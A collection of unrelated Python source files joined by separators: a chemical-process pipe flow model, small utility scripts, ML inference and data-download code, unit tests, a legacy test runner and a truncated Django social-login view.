# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Pipe model for water or steam, Liq or Vap phase must be provided (mixed phase
not supported).
main equations:
* Heat is given (zero if adiabatic)
* Calculate pressure change due to friction and gravity
* Assume enthalpy_in = enthalpy_out + heat
Created: April 2019 by Jinliang Ma
"""
# Import Pyomo libraries
from pyomo.common.config import ConfigBlock, ConfigValue, In, Bool
# Import IDAES cores
from idaes.core import (
ControlVolume0DBlock,
declare_process_block_class,
MaterialBalanceType,
EnergyBalanceType,
MomentumBalanceType,
UnitModelBlockData,
useDefault,
)
from idaes.core.util.config import is_physical_parameter_block
from idaes.core.util.constants import Constants as const
from idaes.core.solvers import get_solver
import idaes.logger as idaeslog
# Additional import for the unit operation
from pyomo.environ import SolverFactory, value, Var, Reference
__author__ = "Boiler Subsystem Team (J. Ma, M. Zamarripa)"
__version__ = "2.0.0"
@declare_process_block_class("WaterPipe")
class WaterPipeData(UnitModelBlockData):
"""
Water or steam pipe Unit Class
"""
CONFIG = UnitModelBlockData.CONFIG()
CONFIG.declare(
"material_balance_type",
ConfigValue(
default=MaterialBalanceType.componentPhase,
domain=In(MaterialBalanceType),
description="Material balance construction flag",
doc="""Indicates what type of material balance should be constructed,
**default** - MaterialBalanceType.componentPhase.
**Valid values:** {
**MaterialBalanceType.none** - exclude material balances,
**MaterialBalanceType.componentPhase** - use phase component balances,
**MaterialBalanceType.componentTotal** - use total component balances,
**MaterialBalanceType.elementTotal** - use total element balances,
**MaterialBalanceType.total** - use total material balance.}""",
),
)
CONFIG.declare(
"energy_balance_type",
ConfigValue(
default=EnergyBalanceType.enthalpyTotal,
domain=In(EnergyBalanceType),
description="Energy balance construction flag",
doc="""Indicates what type of energy balance should be constructed,
**default** - EnergyBalanceType.enthalpyTotal.
**Valid values:** {
**EnergyBalanceType.none** - exclude energy balances,
**EnergyBalanceType.enthalpyTotal** - single enthalpy balance for material,
**EnergyBalanceType.enthalpyPhase** - enthalpy balances for each phase,
**EnergyBalanceType.energyTotal** - single energy balance for material,
**EnergyBalanceType.energyPhase** - energy balances for each phase.}""",
),
)
CONFIG.declare(
"momentum_balance_type",
ConfigValue(
default=MomentumBalanceType.pressureTotal,
domain=In(MomentumBalanceType),
description="Momentum balance construction flag",
doc="""Indicates what type of momentum balance should be constructed,
**default** - MomentumBalanceType.pressureTotal.
**Valid values:** {
**MomentumBalanceType.none** - exclude momentum balances,
**MomentumBalanceType.pressureTotal** - single pressure balance for material,
**MomentumBalanceType.pressurePhase** - pressure balances for each phase,
**MomentumBalanceType.momentumTotal** - single momentum balance for material,
**MomentumBalanceType.momentumPhase** - momentum balances for each phase.}""",
),
)
CONFIG.declare(
"has_heat_transfer",
ConfigValue(
default=False,
domain=Bool,
description="Heat transfer term construction flag",
doc="""Indicates whether terms for heat transfer should be constructed,
**default** - False.
**Valid values:** {
**True** - include heat transfer terms,
**False** - exclude heat transfer terms.}""",
),
)
CONFIG.declare(
"has_pressure_change",
ConfigValue(
default=True,
domain=Bool,
description="Pressure change term construction flag",
doc="""Indicates whether terms for pressure change should be
constructed,
**default** - True.
**Valid values:** {
**True** - include pressure change terms,
**False** - exclude pressure change terms.}""",
),
)
CONFIG.declare(
"property_package",
ConfigValue(
default=useDefault,
domain=is_physical_parameter_block,
description="Property package to use for control volume",
doc="""Property parameter object used to define property calculations,
**default** - useDefault.
**Valid values:** {
**useDefault** - use default package from parent model or flowsheet,
**PhysicalParameterObject** - a PhysicalParameterBlock object.}""",
),
)
CONFIG.declare(
"property_package_args",
ConfigBlock(
implicit=True,
description="Arguments to use for constructing property packages",
doc="""A ConfigBlock with arguments to be passed to a property block(s)
and used when constructing these,
**default** - None.
**Valid values:** {
see property package for documentation.}""",
),
)
CONFIG.declare(
"contraction_expansion_at_end",
ConfigValue(
default="None",
domain=In(["None", "contraction", "expansion"]),
description="Any contraction or expansion at the end",
doc="Define if pressure drop due to contraction"
" or expansion needs to be considered",
),
)
CONFIG.declare(
"water_phase",
ConfigValue(
default="Liq",
domain=In(["Liq", "Vap"]),
description="Water phase",
doc="""Define water phase for property calls,
mixed phase not supported""",
),
)
def build(self):
"""
Begin building model
"""
# Call UnitModel.build to setup dynamics
super(WaterPipeData, self).build()
# Build Control Volume
self.control_volume = ControlVolume0DBlock(
default={
"dynamic": self.config.dynamic,
"has_holdup": self.config.has_holdup,
"property_package": self.config.property_package,
"property_package_args": self.config.property_package_args,
}
)
self.control_volume.add_geometry()
self.control_volume.add_state_blocks(has_phase_equilibrium=False)
self.control_volume.add_material_balances(
balance_type=self.config.material_balance_type,
)
self.control_volume.add_energy_balances(
balance_type=self.config.energy_balance_type,
has_heat_transfer=self.config.has_heat_transfer,
)
self.control_volume.add_momentum_balances(
balance_type=self.config.momentum_balance_type, has_pressure_change=True
)
# Add Ports
self.add_inlet_port()
self.add_outlet_port()
# Add object references
self.volume = Reference(self.control_volume.volume)
# Set references to balance terms at unit level
if (
self.config.has_heat_transfer is True
and self.config.energy_balance_type != EnergyBalanceType.none
):
self.heat_duty = Reference(self.control_volume.heat)
if (
self.config.has_pressure_change is True
and self.config.momentum_balance_type != "none"
):
self.deltaP = Reference(self.control_volume.deltaP)
# Set Unit Geometry and Volume
self._set_geometry()
# Construct performance equations
self._make_performance()
def _set_geometry(self):
"""
Define the geometry of the unit as necessary
"""
# Number of pipe
self.number_of_pipes = Var(initialize=4, doc="Number of pipes")
# Length of pipe
self.length = Var(initialize=10.0, doc="Total length of the straight pipe")
# Elevation change of pipe, elevation of outlet - elevation of inlet
self.elevation_change = Var(
initialize=10.0, doc="Change of elevation from inlet to outlet"
)
# Inside diameter of pipe
self.diameter = Var(initialize=0.6, doc="Inside diameter of pipe")
if not self.config.contraction_expansion_at_end == "None":
self.area_ratio = Var(
initialize=1, doc="Cross section area ratio of exit end to pipe"
)
# Volume constraint
@self.Constraint(self.flowsheet().time, doc="Total volume of all pipes")
def volume_eqn(b, t):
return (
b.volume[t]
== 0.25 * const.pi * b.diameter**2 * b.length * b.number_of_pipes
)
def _make_performance(self):
"""
Define constraints which describe the behaviour of the unit model.
"""
phase = self.config.water_phase
# Add performance variables
# Velocity of fluid inside pipe
self.velocity = Var(
self.flowsheet().time, initialize=10.0, doc="Fluid velocity inside pipe"
)
# Reynolds number
self.N_Re = Var(
self.flowsheet().time, initialize=10000.0, doc="Reynolds number"
)
# Darcy friction factor
self.friction_factor_darcy = Var(
self.flowsheet().time, initialize=0.005, doc="Darcy friction factor"
)
# Correction factor for pressure drop due to friction
self.fcorrection_dp = Var(
initialize=1.0, doc="Correction factor for pressure drop"
)
# Pressure change due to friction
self.deltaP_friction = Var(
self.flowsheet().time,
initialize=-1.0,
doc="Pressure change due to friction",
)
# Pressure change due to gravity
self.deltaP_gravity = Var(
self.flowsheet().time, initialize=0.0, doc="Pressure change due to gravity"
)
# Pressure change due to area change at end
self.deltaP_area_change = Var(
self.flowsheet().time,
initialize=0.0,
doc="Pressure change due to area change",
)
# Equation for calculating velocity
@self.Constraint(self.flowsheet().time, doc="Velocity of fluid inside pipe")
def velocity_eqn(b, t):
return (
b.velocity[t] * 0.25 * const.pi * b.diameter**2 * b.number_of_pipes
== b.control_volume.properties_in[t].flow_vol
)
# Equation for calculating Reynolds number
@self.Constraint(self.flowsheet().time, doc="Reynolds number")
def Reynolds_number_eqn(b, t):
return (
b.N_Re[t] * b.control_volume.properties_in[t].visc_d_phase[phase]
== b.diameter
* b.velocity[t]
* b.control_volume.properties_in[t].dens_mass_phase[phase]
)
# Friction factor expression depending on laminar or turbulent flow
@self.Constraint(
self.flowsheet().time,
doc="Darcy friction factor as" " a function of Reynolds number",
)
def friction_factor_darcy_eqn(b, t):
return (
b.friction_factor_darcy[t] * b.N_Re[t] ** (0.25)
== 0.3164 * b.fcorrection_dp
)
# Pressure change equation for friction
@self.Constraint(self.flowsheet().time, doc="Pressure change due to friction")
def pressure_change_friction_eqn(b, t):
return (
b.deltaP_friction[t] * b.diameter
== -0.5
* b.control_volume.properties_in[t].dens_mass_phase[phase]
* b.velocity[t] ** 2
* b.friction_factor_darcy[t]
* b.length
)
# Pressure change equation for gravity
@self.Constraint(self.flowsheet().time, doc="Pressure change due to gravity")
def pressure_change_gravity_eqn(b, t):
return (
b.deltaP_gravity[t]
== -const.acceleration_gravity
* b.control_volume.properties_in[t].dens_mass_phase[phase]
* b.elevation_change
)
# Pressure change equation for contraction or expansion
        @self.Constraint(self.flowsheet().time, doc="Pressure change due to area change")
def pressure_change_area_change_eqn(b, t):
if self.config.contraction_expansion_at_end == "contraction":
return (
b.deltaP_area_change[t]
== -(0.1602 * b.area_ratio**2 - 0.646 * b.area_ratio + 1.4858)
* 0.5
* b.control_volume.properties_out[t].dens_mass_phase[phase]
* (b.velocity[t] / b.area_ratio) ** 2
+ 0.5
* b.control_volume.properties_out[t].dens_mass_phase[phase]
* b.velocity[t] ** 2
)
elif self.config.contraction_expansion_at_end == "expansion":
return (
b.deltaP_area_change[t]
== b.control_volume.properties_out[t].dens_mass_phase[phase]
* b.velocity[t] ** 2
* (b.area_ratio - 1)
/ b.area_ratio**2
)
else:
return b.deltaP_area_change[t] == 0
# Total pressure change equation
@self.Constraint(self.flowsheet().time, doc="Pressure drop")
def pressure_change_total_eqn(b, t):
return b.deltaP[t] == (
b.deltaP_friction[t] + b.deltaP_gravity[t] + b.deltaP_area_change[t]
)
def set_initial_condition(self):
if self.config.dynamic is True:
self.control_volume.material_accumulation[:, :, :].value = 0
self.control_volume.energy_accumulation[:, :].value = 0
self.control_volume.material_accumulation[0, :, :].fix(0)
self.control_volume.energy_accumulation[0, :].fix(0)
def initialize_build(
blk, state_args=None, outlvl=idaeslog.NOTSET, solver=None, optarg=None
):
"""
WaterPipe initialization routine.
Keyword Arguments:
state_args : a dict of arguments to be passed to the property
package(s) for the control_volume of the model to
provide an initial state for initialization
(see documentation of the specific property package)
(default = None).
outlvl : sets output level of initialisation routine
optarg : solver options dictionary object (default=None, use
default solver options)
solver : str indicating which solver to use during
initialization (default = None, use default solver)
Returns:
None
"""
init_log = idaeslog.getInitLogger(blk.name, outlvl, tag="unit")
solve_log = idaeslog.getSolveLogger(blk.name, outlvl, tag="unit")
# Create solver
opt = get_solver(solver, optarg)
flags = blk.control_volume.initialize(
outlvl=outlvl + 1, optarg=optarg, solver=solver, state_args=state_args
)
init_log.info_high("Initialization Step 1 Complete.")
# Fix outlet enthalpy and pressure
for t in blk.flowsheet().time:
blk.control_volume.properties_out[t].pressure.fix(
value(blk.control_volume.properties_in[t].pressure)
)
blk.pressure_change_total_eqn.deactivate()
with idaeslog.solver_log(solve_log, idaeslog.DEBUG) as slc:
res = opt.solve(blk, tee=slc.tee)
init_log.info_high("Initialization Step 2 {}.".format(idaeslog.condition(res)))
# Unfix outlet enthalpy and pressure
for t in blk.flowsheet().time:
blk.control_volume.properties_out[t].pressure.unfix()
blk.pressure_change_total_eqn.activate()
with idaeslog.solver_log(solve_log, idaeslog.DEBUG) as slc:
res = opt.solve(blk, tee=slc.tee)
init_log.info_high("Initialization Step 3 {}.".format(idaeslog.condition(res)))
blk.control_volume.release_state(flags, outlvl)
init_log.info("Initialization Complete.")
def calculate_scaling_factors(self):
pass
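

if __name__ == "__main__":
    # Back-of-the-envelope check of the correlations encoded in the constraints above,
    # written in plain Python rather than Pyomo. All numbers are illustrative only.
    rho = 900.0   # kg/m3, assumed liquid density
    mu = 1.2e-4   # Pa*s, assumed viscosity
    g = 9.80665   # m/s2
    d, length, dz, v = 0.6, 10.0, 10.0, 10.0
    n_re = rho * v * d / mu
    f_darcy = 0.3164 / n_re ** 0.25                       # Blasius, cf. friction_factor_darcy_eqn
    dp_friction = -0.5 * rho * v ** 2 * f_darcy * length / d
    dp_gravity = -g * rho * dz
    print(n_re, f_darcy, dp_friction + dp_gravity)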
|
# 031: program that reads the distance of a trip and computes its cost
# 0.50 per km up to 200 km; over 200 km, 0.45 per km
distancia = int(input("Qual a distância percorrida em Km para realizar sua viagem? "))
if distancia < 200:
custo = distancia * 0.50
print(f"A sua viagem será de {distancia}km. "
f"O custo da viagem é de R${custo:.2f}.")
else:
custo = distancia * 0.45
print(f"A sua viagem será de {distancia}km. "
f"O custo da viagem será de R${custo:.2f}. ")
|
from .arch_strand import ArchStrand
|
# -*- coding: utf-8 -*-
from app.constants import S_OK, S_ERR
import random
import math
import base64
import time
import ujson as json
from app import cfg
from app import util
def parse_json_kaohsiung_dig_point(data):
    '''
    Adds the following keys to `data`: 1. town_name 2. location 3. range 4. work_institute 5. work_institute2
    '''
data['town_name'] = data.get('extension', {}).get('district', '')
data['location'] = data.get('extension', {}).get('work_location', '')
data['range'] = ''
data['work_institute'] = data.get('extension', {}).get('apply_unit', '')
data['work_institute2'] = ''
data['geo'] = []
if 'extension' in data:
del data['extension']
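

if __name__ == "__main__":
    # Illustration with a hand-made record; the field names inside 'extension' are taken
    # from the parser above, the values are made up.
    record = {'extension': {'district': 'Sanmin', 'work_location': 'Jiouru 1st Rd.', 'apply_unit': 'Water Bureau'}}
    parse_json_kaohsiung_dig_point(record)
    print(record['town_name'], record['location'], record['work_institute'])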
|
r"""
`contk.metrics` provides functions evaluating results of models. It provides
a fair metric for every model.
"""
from .metric import MetricBase, PerlplexityMetric, BleuCorpusMetric, \
SingleDialogRecorder, LanguageGenerationRecorder, MetricChain
__all__ = ["MetricBase", "PerlplexityMetric", "BleuCorpusMetric", \
"SingleDialogRecorder", "LanguageGenerationRecorder", "MetricChain"]
|
class BaseOptError(Exception):
pass
class DefaultValueError(BaseOptError):
pass
class ChoicesValueError(BaseOptError):
pass
class ValueTypeError(BaseOptError):
pass
class BaseOpt(object):
def __init__(self, default, type, help=None, required=False,
secret=False, choices=None, app_config=None):
self.default = default
self.help = help
self.required = required
self.secret = secret
self.choices = choices
self.type = type
self.app_config = app_config
self._check()
def _check(self):
if self.choices is not None:
if not isinstance(self.choices, list):
raise ChoicesValueError()
for choice in self.choices:
if not isinstance(choice, self.type):
raise ChoicesValueError()
if self.default is not None:
if not isinstance(self.default, self.type):
raise DefaultValueError()
if self.choices and self.default not in self.choices:
raise DefaultValueError()
def get_deafult(self):
return self.fromat(self.default)
def fromat(self, value):
try:
return self._fromat(value)
except:
raise ValueTypeError()
def _fromat(self, value):
return self.type(value)
class StrOpt(BaseOpt):
def __init__(self, default, help=None, required=False,
secret=False, choices=None, app_config=None):
super(StrOpt, self).__init__(default, str, help, required,
secret, choices, app_config)
class IntOpt(BaseOpt):
def __init__(self, default, help=None, required=False,
secret=False, choices=None, app_config=None):
super(IntOpt, self).__init__(default, int, help, required,
secret, choices, app_config)
class BooleanOpt(BaseOpt):
def __init__(self, default, help=None, required=False,
secret=False, choices=None, app_config=None):
super(BooleanOpt, self).__init__(default, bool, help, required,
secret, choices, app_config)
def _fromat(self, value):
if value in ['True', 'true']:
return True
elif value in ['False', 'false']:
return False
class ListOpt(BaseOpt):
def __init__(self, default, help=None, required=False,
secret=False, choices=None, app_config=None):
super(ListOpt, self).__init__(default, list, help, required,
secret, choices, app_config)
def _fromat(self, value):
return value.split(',')
class FloatOpt(BaseOpt):
def __init__(self, default, help=None, required=False,
secret=False, choices=None, app_config=None):
super(FloatOpt, self).__init__(default, float, help, required,
secret, choices, app_config)
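

if __name__ == "__main__":
    # Minimal usage sketch; option names and values are illustrative only.
    port = IntOpt(default=8080, help="listen port", choices=[8080, 9090])
    print(port.get_deafult())     # -> 8080 (method name is spelled this way in this module)
    debug = BooleanOpt(default=False)
    print(debug.fromat("true"))   # -> True
    hosts = ListOpt(default=[], help="comma-separated hosts")
    print(hosts.fromat("a,b,c"))  # -> ['a', 'b', 'c']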
|
"""
Copyright (C) 2019 NVIDIA Corporation. All rights reserved.
Licensed under the NVIDIA Source Code License. See LICENSE.md at https://github.com/NVlabs/extreme-view-synth.
Authors: Inchang Choi, Orazio Gallo, Alejandro Troccoli, Min H. Kim, and Jan Kautz
"""
import numpy as np
import torch
from torch.autograd import Variable
import os
import time
import imageio
from vsynthlib.refinet.models import Model_VNPCAT
from vsynthlib import depth_util
class DeepViewRefiner(object):
NUM_INPUT_CHANNELS = 27
def __init__(self, filename_model_weight, working_dir, out_dir,
patch_size=64,
with_CUDA=True):
# define the model
self.model = Model_VNPCAT()
# load weight
self.with_CUDA = with_CUDA
self.model.load_state_dict(torch.load(filename_model_weight))
if with_CUDA:
self.model.cuda()
self.working_dir = working_dir
self.out_dir = out_dir
self.patch_size = patch_size
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
pass
def do(self, synth_obj, list_src_img, list_src_cam, count=0,
do_stereo=False, return_val=False, custom_outdir=''):
value = self.do_VNPCAT(synth_obj, list_src_img, list_src_cam,
count=count, return_val=return_val,
without_candi= False,
custom_outdir=custom_outdir)
if return_val:
return value
def do_VNPCAT(self, synth_obj, list_src_img, list_src_cam, count=0,
return_val=False, without_candi=False, custom_outdir=''):
func_fetch_patch = depth_util.fetch_patches_VNP
# load synth data
img_synth = synth_obj['img_synth']
depth_map_P1 = synth_obj['depth_map_P1']
depth_map_P2 = synth_obj['depth_map_P2']
dest_cam = synth_obj['dest_cam']
height, width, _ = img_synth.shape
        # perform refinement patch-by-patch
#############################################################
# Do Testing
#############################################################
img_merged = np.zeros(shape=(height, width, 3))
img_counter = np.zeros(shape=(height, width, 3))
for j in range(0, height, int(self.patch_size / 4)):
for i in range(0, width, int(self.patch_size / 4)):
t_start = time.time()
# set the model to the evaluation mode
self.model.eval()
# get candidate tensor
x_top = i
y_top = j
if x_top + self.patch_size >= width:
x_top = width - self.patch_size
if y_top + self.patch_size >= height:
y_top = height - self.patch_size
t_input_synth, list_t_candi_patch = func_fetch_patch(y_top, x_top, self.patch_size, dest_cam,
img_synth, list_src_img, list_src_cam,
depth_map_P1, depth_map_P2)
if t_input_synth is None:
print('None!')
continue
# check if more than half of input pixels are valid
t_in_slice = t_input_synth[0]
bool_nz = t_in_slice != -0.5
bool_nz = bool_nz.astype(np.float)
sum_nz = np.sum(bool_nz)
if sum_nz < self.patch_size * self.patch_size * 0.6:
continue
t_input_synth = np.expand_dims(t_input_synth, axis=0)
t_input_synth = t_input_synth.astype(np.float32)
_, chs, _, _ = t_input_synth.shape
n_patches = len(list_t_candi_patch)
t_in_synth = t_input_synth
input_synth_tensor \
= torch.from_numpy(t_in_synth)
if self.with_CUDA:
input_synth_tensor = input_synth_tensor.cuda()
with torch.no_grad():
input_synth_variable = Variable(input_synth_tensor, requires_grad=False)
list_input_candi_variable = []
for i in range(n_patches):
candi_patch = list_t_candi_patch[i]
candi_patch = np.expand_dims(candi_patch, axis=0)
candi_patch = candi_patch.astype(np.float32)
candi_tensor = torch.from_numpy(candi_patch)
if self.with_CUDA:
candi_tensor = candi_tensor.cuda()
with torch.no_grad():
input_candi_variable = Variable(candi_tensor)
list_input_candi_variable.append(input_candi_variable)
# do forward pass
if without_candi:
output_variable = self.model(input_synth_variable)
output_to_show = output_variable[0].cpu().data[0]
else:
output_variable = self.model(input_synth_variable, list_input_candi_variable)
output_to_show = output_variable.cpu().data[0]
output_to_show = output_to_show + 0.5
output_to_show = output_to_show.permute(1, 2, 0).numpy()
output_to_show[output_to_show < 0.0] = 0.0
output_to_show[output_to_show > 1.0] = 1.0
output_to_show = output_to_show * 255.0
output_to_show = output_to_show.astype(np.uint8)
img_merged[y_top:(y_top + self.patch_size), x_top:(x_top + self.patch_size), :] += output_to_show
img_counter[y_top:(y_top + self.patch_size), x_top:(x_top + self.patch_size), :] += 1
t_current = time.time()
t_elapsed_row = t_current - t_start
# delete variables
del input_synth_variable
for var in list_input_candi_variable:
self.var = var
del self.var
img_merged = img_merged / (img_counter + 1e-10)
img_merged /= 255.0
if return_val:
return img_merged[0:height, 0:width]
else:
filename_out_prefix = 'refined_vsynth_%04d' % (count)
if custom_outdir != '':
imageio.imwrite('%s/%s.png' % (custom_outdir, filename_out_prefix), img_merged[0:height, 0:width])
else:
imageio.imwrite('%s/%s.png' % (self.out_dir, filename_out_prefix), img_merged[0:height, 0:width])
|
import factory
from booking.models import MaterialImage
from booking.tests.factories import MaterialFactory
class MaterialImageFactory(factory.django.DjangoModelFactory):
class Meta:
model = MaterialImage
material = factory.SubFactory(MaterialFactory)
image = factory.django.ImageField()
|
import psutil
import platform
from datetime import datetime
def get_size(bytes, suffix="B"):
"""
Scale bytes to its proper format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
def get_diskfree():
partitions = psutil.disk_partitions()
df = ""
for partition in partitions:
try:
partition_usage = psutil.disk_usage(partition.mountpoint)
except PermissionError:
continue
if partition.mountpoint == "/":
df = "disk Free| " + str(get_size(partition_usage.free)) + " | " + str(partition_usage.percent) + " o|o used"
return df
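# Editor's addition (illustrative only, not in the original script): a small driver
# showing the intended use of the helpers above; output depends on the host machine.
if __name__ == "__main__":
    uname = platform.uname()
    print(f"System: {uname.system} {uname.release}, boot: "
          f"{datetime.fromtimestamp(psutil.boot_time())}")
    mem = psutil.virtual_memory()
    print(f"RAM total: {get_size(mem.total)}, available: {get_size(mem.available)}")
    print(get_diskfree())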
|
# -*- coding: utf-8 -*-
import unittest
import six
from launchd import cmd
class LaunchdCmdTest(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
def tearDown(self):
unittest.TestCase.tearDown(self)
def testlaunchctl_invalid_args(self):
self.assertRaises(ValueError, cmd.launchctl, ["foo"])
def testlaunchctl_list(self):
stdout = cmd.launchctl("list").decode("utf-8")
self.assertTrue(isinstance(stdout, six.string_types))
def testlaunchctl_list_x(self):
label = "com.apple.Finder"
stdout = cmd.launchctl("list", label).decode("utf-8")
self.assertTrue(isinstance(stdout, six.string_types))
|
import numpy as np
import os
from keras.datasets import mnist
from keras.utils import np_utils
print('Start downloading dataset...')
# load MNIST from server
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# training data : 60000 samples
# reshape and normalize input data
x_train = x_train.reshape(x_train.shape[0], 1, 28*28)
x_train = x_train.astype('float32')
x_train /= 255
# encode output which is a number in range [0,9] into a vector of size 10
# e.g. number 3 will become [0, 0, 0, 1, 0, 0, 0, 0, 0, 0]
y_train = np_utils.to_categorical(y_train)
# same for test data : 10000 samples
x_test = x_test.reshape(x_test.shape[0], 1, 28*28)
x_test = x_test.astype('float32')
x_test /= 255
y_test = np_utils.to_categorical(y_test)
if not os.path.exists('data/'):
os.makedirs('data/')
np.savetxt('data/mnist_images_train.csv', x_train.reshape(len(x_train),784).tolist())
np.savetxt('data/mnist_images_test.csv', x_test.reshape(len(x_test),784).tolist())
np.savetxt('data/mnist_labels_train.csv', y_train.tolist())
np.savetxt('data/mnist_labels_test.csv', y_test.tolist())
print('Dataset downloaded.')
print('Data is located here:', os.path.join(os.getcwd(), 'data'))
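# Editor's addition (illustrative, not part of the original script): the files are
# plain space-separated text, so they can be reloaded with numpy, e.g.:
labels_check = np.loadtxt('data/mnist_labels_test.csv')
print('Reloaded test labels with shape:', labels_check.shape)  # expected (10000, 10)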
|
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, ili development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE.md, distributed with this software.
# ----------------------------------------------------------------------------
"""Run all tests.
Originally based on the all_tests.py script from the QIIME project
(http://github.com/qiime/qiime) project at svn revision 3290, now taken from
the E-vident (http://github.com/qiime/evident) project master branch at git SHA
dde2a06f2d990db8b09da65764cd27fc047db788
"""
import re
from os import walk, getcwd, chdir
from sys import exit
from glob import glob
from os.path import join, abspath, dirname, split, exists
from ili.util import get_ili_project_dir
from ili import __version__
from qcli.util import qcli_system_call
from qcli.test import run_script_usage_tests
from qcli.option_parsing import parse_command_line_parameters, make_option
script_info = {}
script_info['brief_description'] = ""
script_info['script_description'] = ""
script_info['script_usage'] = [("", "", "")]
script_info['output_description'] = ""
script_info['required_options'] = []
script_info['optional_options'] = [
make_option('--suppress_unit_tests', action='store_true', help='suppress '
" execution of ili's unit tests [default: %default]",
default=False),
make_option('--suppress_script_usage_tests', action='store_true',
help="suppress ili's script usage tests [default: "
"%default]", default=False),
make_option('--suppress_javascript_unit_tests', action='store_true',
help='suppress ili\'s JavaScript unit tests [default: '
'%default]', default=False),
make_option('--unittest_glob', help='wildcard pattern to match the unit '
'tests to execute [default: %default]', default=None),
make_option('--script_usage_tests', help='comma-separated list of the '
'script usage tests to execute [default: run all]',
default=None),
make_option('-p', '--temp_filepath', type='existing_path', help='temporary'
' directory where the script usage tests will be executed',
default='/tmp/'),
make_option('--ili_scripts_dir', help='filepath where the scripts are'
' stored', type='existing_path', default=None)
]
script_info['version'] = __version__
script_info['help_on_no_arguments'] = False
def main():
option_parser, opts, args = parse_command_line_parameters(**script_info)
unittest_glob = opts.unittest_glob
temp_filepath = opts.temp_filepath
script_usage_tests = opts.script_usage_tests
suppress_unit_tests = opts.suppress_unit_tests
suppress_script_usage_tests = opts.suppress_script_usage_tests
suppress_javascript_unit_tests = opts.suppress_javascript_unit_tests
# since the test data is in the tests folder just add scripts_test_data
ili_test_data_dir = join(abspath(dirname(__file__)),
'scripts_test_data/')
# offer the option for the user to pass the scripts dir from the command
# line since there is no other way to get the scripts dir. If not provided
# the base structure of the repository will be assumed. Note that for both
# cases we are using absolute paths, to avoid unwanted failures.
if opts.ili_scripts_dir is None:
ili_scripts_dir = abspath(join(get_ili_project_dir(), 'scripts/'))
else:
ili_scripts_dir = abspath(opts.ili_scripts_dir)
# make a sanity check
if (suppress_unit_tests and suppress_script_usage_tests and
suppress_javascript_unit_tests):
option_parser.error("All tests have been suppresed. Nothing to run.")
test_dir = abspath(dirname(__file__))
unittest_good_pattern = re.compile('OK\s*$')
application_not_found_pattern = re.compile('ApplicationNotFoundError')
python_name = 'python'
bad_tests = []
missing_application_tests = []
# Run through all of ili's unit tests, and keep track of any files
# which fail unit tests, note that these are the unit tests only
if not suppress_unit_tests:
unittest_names = []
if not unittest_glob:
for root, dirs, files in walk(test_dir):
for name in files:
if name.startswith('test_') and name.endswith('.py'):
unittest_names.append(join(root, name))
else:
for fp in glob(unittest_glob):
fn = split(fp)[1]
if fn.startswith('test_') and fn.endswith('.py'):
unittest_names.append(abspath(fp))
unittest_names.sort()
for unittest_name in unittest_names:
print "Testing %s:\n" % unittest_name
command = '%s %s -v' % (python_name, unittest_name)
stdout, stderr, return_value = qcli_system_call(command)
print stderr
if not unittest_good_pattern.search(stderr):
if application_not_found_pattern.search(stderr):
missing_application_tests.append(unittest_name)
else:
bad_tests.append(unittest_name)
script_usage_failures = 0
# choose to run some of the script usage tests or all the available ones
if (not suppress_script_usage_tests and exists(ili_test_data_dir) and
exists(ili_scripts_dir)):
if script_usage_tests is not None:
script_tests = script_usage_tests.split(',')
else:
script_tests = None
initial_working_directory = getcwd()
# Run the script usage testing functionality; note that depending on
# the module where this was imported, the name of the arguments will
# change that's the reason why I added the name of the arguments in
# here
script_usage_result_summary, script_usage_failures = \
run_script_usage_tests(ili_test_data_dir, # test_data_dir
ili_scripts_dir, # scripts_dir
temp_filepath, # working_dir
True, # verbose
script_tests, # tests
None, # failure_log_fp
False) # force_overwrite
# running script usage tests breaks the current working directory
chdir(initial_working_directory)
if not suppress_javascript_unit_tests:
runner = join(test_dir, 'javascript_tests', 'runner.js')
index = join(test_dir, 'javascript_tests', 'index.html')
o, e, r = qcli_system_call('phantomjs %s %s' % (runner, index))
if o:
print o
if e:
print e
# if all the tests passed
javascript_tests_passed = True if r == 0 else False
else:
javascript_tests_passed = True
print "==============\nResult summary\n=============="
if not suppress_unit_tests:
print "\nUnit test result summary\n------------------------\n"
if bad_tests:
print ("\nFailed the following unit tests.\n%s"
% '\n'.join(bad_tests))
if missing_application_tests:
print ("\nFailed the following unit tests, in part or whole due "
"to missing external applications.\nDepending on the "
"ili features you plan to use, this may not be "
"critical.\n%s" % '\n'.join(missing_application_tests))
if not(missing_application_tests or bad_tests):
print "\nAll unit tests passed.\n"
if not suppress_script_usage_tests:
if exists(ili_test_data_dir) and exists(ili_scripts_dir):
print ("\nScript usage test result summary"
"\n--------------------------------\n")
print script_usage_result_summary
else:
print ("\nCould not run script usage tests.\nThe ili scripts "
"directory could not be automatically located, try "
"supplying it manually using the --ili_scripts_dir "
"option.")
if not suppress_javascript_unit_tests:
print ('\nJavaScript unit tests result summary\n'
'------------------------------------\n')
if javascript_tests_passed:
print 'All JavaScript unit tests passed.\n'
else:
print 'JavaScript unit tests failed, check the summary above.'
# In case there were no failures of any type, exit with a return code of 0
return_code = 1
if (len(bad_tests) == 0 and len(missing_application_tests) == 0 and
script_usage_failures == 0 and javascript_tests_passed):
return_code = 0
return return_code
if __name__ == "__main__":
exit(main())
|
# -*- coding: utf-8 -*-
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.core.urlresolvers import reverse
# In this example, SiteUser is imported just to get all users
# to display on the home page.
# In a real project it is usually not necessary to import SiteUser.
from social_login.models import SiteUser
# As with SiteUser, the following two are imported just for this example,
# to get the site_name_zh
from socialoauth import socialsites
from socialoauth.utils import import_oauth_class
from .models import UserAuth, UserInfo
class RegisterLoginError(Exception):
pass
def home(request):
if request.siteuser:
if not UserInfo.objects.filter(user_id=request.siteuser.id).exists():
return HttpResponseRedirect(reverse('register_step_2'))
all_users = SiteUser.objects.select_related('user_info', 'social_user').all()
def _make_user_info(u):
info = {}
info['id'] = u.id
info['social'] = u.is_social
if info['social']:
site_id = u.social_user.site_id
s = import_oauth_class( socialsites.get_site_class_by_id(site_id) )()
info['social'] = s.site_name_zh
info['username'] = u.user_info.username
